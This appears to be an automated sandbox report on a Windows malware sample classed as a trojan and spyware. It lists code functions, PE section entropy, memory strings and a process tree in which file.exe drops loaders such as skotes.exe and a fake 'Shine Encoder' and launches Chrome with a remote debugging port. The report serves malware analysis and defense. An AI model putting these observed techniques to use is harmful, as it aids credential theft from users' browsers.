Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75E2B0	0_2_6C75E2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7622A0	0_2_6C7622A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C726370	0_2_6C726370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D2370	0_2_6C7D2370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C692370	0_2_6C692370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7AC360	0_2_6C7AC360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C698340	0_2_6C698340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C702320	0_2_6C702320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E43E0	0_2_6C6E43E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C23A0	0_2_6C6C23A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6EE3B0	0_2_6C6EE3B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C693C40	0_2_6C693C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B9C40	0_2_6C7B9C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A1C30	0_2_6C6A1C30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C751CE0	0_2_6C751CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7CDCD0	0_2_6C7CDCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C72FC80	0_2_6C72FC80
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Code function: 9_2_00685C83	9_2_00685C83
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Code function: 9_2_0068735A	9_2_0068735A
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Code function: 9_2_006C8860	9_2_006C8860
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Code function: 9_2_00684DE0	9_2_00684DE0
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Code function: 9_2_00684B30	9_2_00684B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00618860	10_2_00618860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00617049	10_2_00617049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_006178BB	10_2_006178BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_006131A8	10_2_006131A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_005D4B30	10_2_005D4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00612D10	10_2_00612D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_005D4DE0	10_2_005D4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00607F36	10_2_00607F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_0061779B	10_2_0061779B
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Code function: 19_3_0138B690	19_3_0138B690
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Code function: 19_3_0138B690	19_3_0138B690
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Code function: 19_3_0138B690	19_3_0138B690
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Code function: 19_3_0138B690	19_3_0138B690

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6B3620 appears 61 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C81D930 appears 43 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6B9B10 appears 70 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C81DAE0 appears 52 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C8109D0 appears 247 times
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Code function: String function: 006980C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 005E80C0 appears 130 times

Source: stories.tmp.12.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: stories.tmp.12.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-QG72D.tmp.13.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-QG72D.tmp.13.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows

Source: is-1GO4T.tmp.13.dr	Static PE information: Number of sections : 19 > 10
Source: sqlite3.dll.16.dr	Static PE information: Number of sections : 19 > 10

Source: file.exe, 00000000.00000002.2070823905.000000006F902000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2065174879.0000000023A62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs file.exe
Source: file.exe, 00000000.00000002.2065174879.0000000023A62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: shineencoder32.exe.13.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: EShineEncoder.exe.16.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe	Static PE information: Section: ylgrvzmt ZLIB complexity 0.9950445457783443
Source: random[1].exe.11.dr	Static PE information: Section: ylgrvzmt ZLIB complexity 0.9950445457783443
Source: df5dd36577.exe.11.dr	Static PE information: Section: ylgrvzmt ZLIB complexity 0.9950445457783443
Source: random[1].exe0.11.dr	Static PE information: Section: ZLIB complexity 0.9992800767918089
Source: random[1].exe0.11.dr	Static PE information: Section: inlhqcme ZLIB complexity 0.9948106751824818
Source: e708276138.exe.11.dr	Static PE information: Section: ZLIB complexity 0.9992800767918089
Source: e708276138.exe.11.dr	Static PE information: Section: inlhqcme ZLIB complexity 0.9948106751824818

Source: random[2].exe.11.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 76f1524c8d.exe.11.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@100/124@25/18

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6F0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

0_2_6C6F0300

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\OMNUEZ49.htm

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4312:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\DocumentsGDHIDHIEGI.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1006431001\stories.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006431001\stories.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\System32\conhost.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: shineencoder32.exe, 00000010.00000003.2458799587.0000000000A79000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: shineencoder32.exe, 00000010.00000003.2458799587.0000000000A79000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2069404977.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2061944828.000000001DA3B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: shineencoder32.exe, 00000010.00000003.2458799587.0000000000A79000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: shineencoder32.exe, 00000010.00000003.2458799587.0000000000A79000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: file.exe, 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2069404977.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2061944828.000000001DA3B000.00000004.00000020.00020000.00000000.sdmp, shineencoder32.exe, 00000010.00000003.2458799587.0000000000A79000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2069404977.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2061944828.000000001DA3B000.00000004.00000020.00020000.00000000.sdmp, shineencoder32.exe, 00000010.00000003.2458799587.0000000000A79000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2069404977.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2061944828.000000001DA3B000.00000004.00000020.00020000.00000000.sdmp, shineencoder32.exe, 00000010.00000003.2458799587.0000000000A79000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: shineencoder32.exe, 00000010.00000003.2458799587.0000000000A79000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: shineencoder32.exe, 00000010.00000003.2458799587.0000000000A79000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: file.exe, file.exe, 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2069404977.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2061944828.000000001DA3B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2069404977.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2061944828.000000001DA3B000.00000004.00000020.00020000.00000000.sdmp, shineencoder32.exe, 00000010.00000003.2458799587.0000000000A79000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.2069404977.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2061944828.000000001DA3B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: shineencoder32.exe, 00000010.00000003.2458799587.0000000000A79000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000003.1885536823.000000001D935000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2574515518.0000000005B26000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575286477.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2701345089.000000000596A000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2785665171.000000000561C000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2974368233.0000000005ABF000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2976865392.0000000005A89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2069404977.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2061944828.000000001DA3B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2069404977.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2061944828.000000001DA3B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: shineencoder32.exe, 00000010.00000003.2458799587.0000000000A79000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: file.exe

ReversingLabs: Detection: 42%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2184,i,1981261483455303516,8832434919170921423,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsGDHIDHIEGI.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsGDHIDHIEGI.exe "C:\Users\user\DocumentsGDHIDHIEGI.exe"
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1006431001\stories.exe "C:\Users\user\AppData\Local\Temp\1006431001\stories.exe"
Source: C:\Users\user\AppData\Local\Temp\1006431001\stories.exe	Process created: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp "C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp" /SL5="$40464,5532893,721408,C:\Users\user\AppData\Local\Temp\1006431001\stories.exe"
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" pause shine-encoder_11152
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Process created: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe "C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe" -i
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause shine-encoder_11152
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe "C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe "C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe "C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe "C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe "C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe "C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe"
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=e708276138.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2060,i,14162589029449352878,1805181848931644681,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=e708276138.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1924,i,14623625801092511307,12696391534601995446,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe "C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe"
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=e708276138.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1180,i,9199522275752105245,15010947955167671813,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=e708276138.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=2008,i,10237018931466361704,17092853076335079312,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe "C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3924 --field-trial-handle=2060,i,14162589029449352878,1805181848931644681,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe "C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe"
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=e708276138.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2004 --field-trial-handle=1884,i,5161667279183471165,5132445376536631529,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsGDHIDHIEGI.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2184,i,1981261483455303516,8832434919170921423,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe "C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe" -i	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
